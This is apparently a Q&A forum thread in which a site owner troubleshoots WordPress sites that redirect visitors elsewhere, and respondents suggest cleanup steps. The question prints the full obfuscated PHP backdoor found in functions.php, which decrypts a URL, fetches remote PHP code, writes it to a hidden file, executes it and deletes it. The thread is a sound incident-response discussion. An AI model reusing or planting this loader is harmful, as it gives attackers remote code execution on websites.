# Unwanted redirection in wordpress site

Tags: wordpress, .htaccess, redirect, malware

I have couple of wordpress site hosted on shared server, both of the site facing the same issue both of them get redirected to some other site whenever accessed, i found the redirection script in function.php,
and comment on a post. The script that i found in function.php was

```
@ini_set('display_errors', '0');
error_reporting(0);
global $zeeta;
if (!$npDcheckClassBgp && !isset($zeeta)) {

    $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrK42MQsM7IlQPPeZfl3OdrpdmmSLH6uToRkH";
    
if (!function_exists('get_data_ya')) {
    if (ini_get('allow_url_fopen')) {
        function get_data_ya($m) {
            $data = file_get_contents($m);
            return $data;
        }
    }
    else {
        function get_data_ya($m) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $m);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
    }
}

if (!function_exists('wp_cd')) {
        function wp_cd($fd, $fa="") {
            $fe = "wp_frmfunct";
            $len = strlen($fd);
            $ff = '';
            $n = $len>100 ? 8 : 2;
            while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); }
            return $fd^$ff;
       }
}
    

    $reqw = $ay($ao($oa("$pass"), 'wp_function'));
    preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
    $dirs = glob("*", GLOB_ONLYDIR);
    foreach ($dirs as $dira) {
      if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
      $subdirs = glob("$dira/*", GLOB_ONLYDIR);
      foreach ($subdirs as $subdira) {
        if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
      }
    }
    if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
    fwrite($hdl, "<?php\n$mtchs[1]\n?>");
    fclose($hdl);
    include("{$eb}.$algo");
    unlink("{$eb}.$algo");
    $npDcheckClassBgp = 'aue';

    $zeeta = "yup";

    }
```

i have two files in one of the website .htaccess.k and other is .htaccess

.htaccess.k have following code

```
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
```

and .htaccess file have

```
# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
```

i swiped up the entire website and wordpress file i scanned for the malware but nothing found still facing the issue please help.

Answer (score 1):

Facing the same problem. You can find hacked code in another file also follow this step.

- in the wp-include folder, you will find `header.php` file which needs to be deleted. also make sure in `wp-config.php` file there is one like like require header.php also delete that so you will not face warnings.
- search for `wp-load.php` file you can see one many files with this name at different location. one is a core file and others are hacked content. delete those files.
- Also check your theme folder you may have some new folders created delete those folders.

hope this may helps.

Comment: for me it was a plugin called "coresitemaps" and placed a shell on `wp-includes` and `plugins/elementor-pro/data/`

Answer (score 0):

I think your site has been hacked. Finding what they did is something so annoying and never the same. It could be anywhere, inside a plugin, inside your theme, sometimes they even insert malecious script inside WP core folders. The only thing you can do is start searching the DB + the source code files looking for something suspecious. You could start by searching everywhere (DB + files) the name of the site u're landing into or part of it's name. You may find directly the answer. Another thing is to disable JS in your page and see if the redirect is still happening (at least you will understand if it's something server-side or client-side).

Maybe all the malecious code is inside the functions.php and you just need to understand what it is doing exactly

Comment: well thanks for your response, Diego i have found the code in function.php i have already swiped the source codes, recently i did found ```<script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5e9ea8386d403cb9"></script>``` this in footer.php then i have some redirects in comment section too removed all of that.

Comment: Is your site safe now? check the DB aswell. Look for eval's inside the DB

Comment: nope i didnt got rid of it still facing the same issue

Comment: https://zoocahda.buzz/ this is the issue i mean the redirecting site

Comment: You should search that site anywhere in your code base + DB. If it's not anywhere there's only one option left: it has been encoded somewhere in someway, could be base64 or some other reversible stuff

Answer (score 0):

Open up chrome or firefox. Open up dev console. Go to network, click preserve log. Go to the URL that is being redirected. You should be able to find a script that redirects your site in the list of loaded scripts. You will see where one of them looks highly abnormal. Do a view source on your page like this:

```
view-source:example.com
```

Search for that script using CTRL+F

Now go to your database where wp-posts is. Search the database for it

```
SELECT * FROM WP_POSTS WHERE POST_CONTENT LIKE '%sript_url%'
```

now do a replace

```
UPDATE `wp_posts`
SET post_content = REPLACE(post_content,"content_of_script","")
WHERE `post_content` LIKE "%content_of_script%";
```

then install wordfence or a similar plugin to prevent SQL injection.

Answer (score 0):

Open All Theme function.php and remove this script. After that website  working fine